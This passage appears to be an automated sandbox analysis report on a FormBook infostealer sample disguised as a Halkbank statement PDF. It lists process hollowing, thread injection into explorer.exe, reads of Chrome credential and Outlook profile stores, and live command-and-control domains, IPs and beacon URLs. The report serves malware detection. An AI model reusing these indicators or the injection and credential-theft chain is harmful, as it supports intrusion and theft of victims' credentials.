          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B30EA5 mov eax, dword ptr fs:[00000030h]3_2_00B30EA5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFFE87 mov eax, dword ptr fs:[00000030h]3_2_00AFFE87
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A776E2 mov eax, dword ptr fs:[00000030h]3_2_00A776E2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A916E0 mov ecx, dword ptr fs:[00000030h]3_2_00A916E0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38ED6 mov eax, dword ptr fs:[00000030h]3_2_00B38ED6
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A936CC mov eax, dword ptr fs:[00000030h]3_2_00A936CC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AA8EC7
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B1FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B1FEC0
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6E620 mov eax, dword ptr fs:[00000030h]3_2_00A6E620
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B1FE3F mov eax, dword ptr fs:[00000030h]3_2_00B1FE3F
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]3_2_00A6C600
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]3_2_00A6C600
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A6C600 mov eax, dword ptr fs:[00000030h]3_2_00A6C600
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A98E00 mov eax, dword ptr fs:[00000030h]3_2_00A98E00
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]3_2_00A9A61C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A61C mov eax, dword ptr fs:[00000030h]3_2_00A9A61C
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B21608 mov eax, dword ptr fs:[00000030h]3_2_00B21608
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7766D mov eax, dword ptr fs:[00000030h]3_2_00A7766D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]3_2_00A8AE73
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]3_2_00A8AE73
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]3_2_00A8AE73
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]3_2_00A8AE73
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8AE73 mov eax, dword ptr fs:[00000030h]3_2_00A8AE73
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A77E41 mov eax, dword ptr fs:[00000030h]3_2_00A77E41
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2AE44 mov eax, dword ptr fs:[00000030h]3_2_00B2AE44
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B2AE44 mov eax, dword ptr fs:[00000030h]3_2_00B2AE44
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A78794 mov eax, dword ptr fs:[00000030h]3_2_00A78794
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]3_2_00AE7794
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]3_2_00AE7794
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AE7794 mov eax, dword ptr fs:[00000030h]3_2_00AE7794
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AA37F5 mov eax, dword ptr fs:[00000030h]3_2_00AA37F5
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]3_2_00A64F2E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A64F2E mov eax, dword ptr fs:[00000030h]3_2_00A64F2E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9E730 mov eax, dword ptr fs:[00000030h]3_2_00A9E730
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]3_2_00A9A70E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A9A70E mov eax, dword ptr fs:[00000030h]3_2_00A9A70E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]3_2_00B3070D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B3070D mov eax, dword ptr fs:[00000030h]3_2_00B3070D
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A8F716 mov eax, dword ptr fs:[00000030h]3_2_00A8F716
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]3_2_00AFFF10
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00AFFF10 mov eax, dword ptr fs:[00000030h]3_2_00AFFF10
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7FF60 mov eax, dword ptr fs:[00000030h]3_2_00A7FF60
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00B38F6A mov eax, dword ptr fs:[00000030h]3_2_00B38F6A
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_00A7EF40 mov eax, dword ptr fs:[00000030h]3_2_00A7EF40
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 3_2_0040CF23 LdrLoadDll,3_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00403345 SetUnhandledExceptionFilter,1_2_00403345
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_004031B3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004031B3
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040362E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040362E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0041EF4A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041EF4A

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.ladybillplanet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.235.200.146 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeSection unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: 12B0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\vokkqsp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeSection loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeProcess created: C:\Users\user\AppData\Local\Temp\vokkqsp.exe C:\Users\user\AppData\Local\Temp\vokkqsp.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.312579716.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.568728415.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000004.00000002.574267920.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.312579716.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.320111169.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.312579716.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.568728415.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.312306361.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568105021.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000004.00000000.312579716.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.568728415.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_0042A05B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_0042A032
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_004293C1
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_00429663
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_004296CC
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_00429767
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_004297F2
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetLocaleInfoW,1_2_0042A982
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetLocaleInfoW,1_2_00429A45
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_00429B6E
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetLocaleInfoW,1_2_00429C74
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_00429D43
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: EnumSystemLocalesW,1_2_00429F45
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_0040345B cpuid 1_2_0040345B
          Source: C:\Users\user\AppData\Local\Temp\vokkqsp.exeCode function: 1_2_00403097 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00403097
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vokkqsp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception1
          Access Token Manipulation          		2
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts512
          Process Injection          		1
          Access Token Manipulation          		LSASS Memory141
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
          Process Injection          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common11
          Software Packing          		Cached Domain Credentials1
          Remote System Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem25
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 811929 Sample: Halkbank_Ekstre_20191102_07... Startdate: 20/02/2023 Architecture: WINDOWS Score: 100 40 Snort IDS alert for network traffic 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 3 other signatures 2->46 9 Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->9         started        process3 file4 28 C:\Users\user\AppData\Local\...\vokkqsp.exe, PE32 9->28 dropped 12 vokkqsp.exe 1 9->12         started        process5 signatures6 60 Antivirus detection for dropped file 12->60 62 Multi AV Scanner detection for dropped file 12->62 64 Detected unpacking (changes PE section rights) 12->64 66 Maps a DLL or memory area into another process 12->66 15 vokkqsp.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 20 explorer.exe 3 1 15->20 injected process9 dnsIp10 30 www.energybig.xyz 184.94.215.91, 49698, 49699, 80 VXCHNGE-NC01US United States 20->30 32 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 20->32 34 7 other IPs or domains 20->34 48 System process connects to network (likely due to code injection or exploit) 20->48 50 Performs DNS queries to domains with low reputation 20->50 24 colorcpl.exe 13 20->24         started        signatures11 process12 dnsIp13 36 www.cutgang.net 24->36 38 cutgang.net 24->38 52 Tries to steal Mail credentials (via file / registry access) 24->52 54 Tries to harvest and steal browser information (history, passwords, etc) 24->54 56 Modifies the context of a thread in another process (thread injection) 24->56 58 Maps a DLL or memory area into another process 24->58 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe36%ReversingLabsWin32.Trojan.Nsisx
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe44%VirustotalBrowse
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\vokkqsp.exe100%AviraHEUR/AGEN.1213060
          C:\Users\user\AppData\Local\Temp\vokkqsp.exe13%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.vokkqsp.exe.650000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.vokkqsp.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.vokkqsp.exe.400000.0.unpack100%AviraHEUR/AGEN.1213060Download File
          1.0.vokkqsp.exe.400000.0.unpack100%AviraHEUR/AGEN.1213060Download File
          3.0.vokkqsp.exe.400000.0.unpack100%AviraHEUR/AGEN.1213060Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.searchvity.com/?dn=100%URL Reputationmalware
          http://www.searchvity.com/100%URL Reputationmalware
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://ladybillplanet.com/ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC100%Avira URL Cloudmalware
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net/ghii/?1LM=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h0%Avira URL Cloudsafe
          http://www.de-nagel.com/h0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oG100%Avira URL Cloudmalware
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.octohoki.net/ghii/?1LM=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIleqyuhYHktxRXxg==&kTj=94JTJ5e-oG100%Avira URL Cloudmalware
          http://www.wenzid4.top/ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oG100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/?1LM=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0t5RnkbE2XBG6Jig==&kTj=94JTJ5e-oG100%Avira URL Cloudmalware
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.nortonseecurity.com0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          		66.96.162.149
          		truetrue
            		unknown
            ladybillplanet.com
            		66.235.200.146
            		truetrue
              		unknown
              cutgang.net
              		194.102.227.30
              		truetrue
                		unknown
                www.energybig.xyz
                		184.94.215.91
                		truetrue
                  		unknown
                  parkingpage.namecheap.com
                  		198.54.117.212
                  		truefalse
                    		high
                    www.wenzid4.top
                    		107.148.8.96
                    		truetrue
                      		unknown
                      www.octohoki.net
                      		unknown
                      		unknowntrue
                        		unknown
                        www.cutgang.net
                        		unknown
                        		unknowntrue
                          		unknown
                          www.ladybillplanet.com
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.octohoki.net/ghii/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.energybig.xyz/ghii/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.energybig.xyz/ghii/?1LM=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7tqaEj2Tcyyr5eEg==&kTj=94JTJ5e-oGtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.ladybillplanet.com/ghii/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.genuineinsights.cloud/ghii/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.wenzid4.top/ghii/?1LM=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AgWuiPHLLIEAEQ==&kTj=94JTJ5e-oGtrue
                            • Avira URL Cloud: malware
                            		unknown
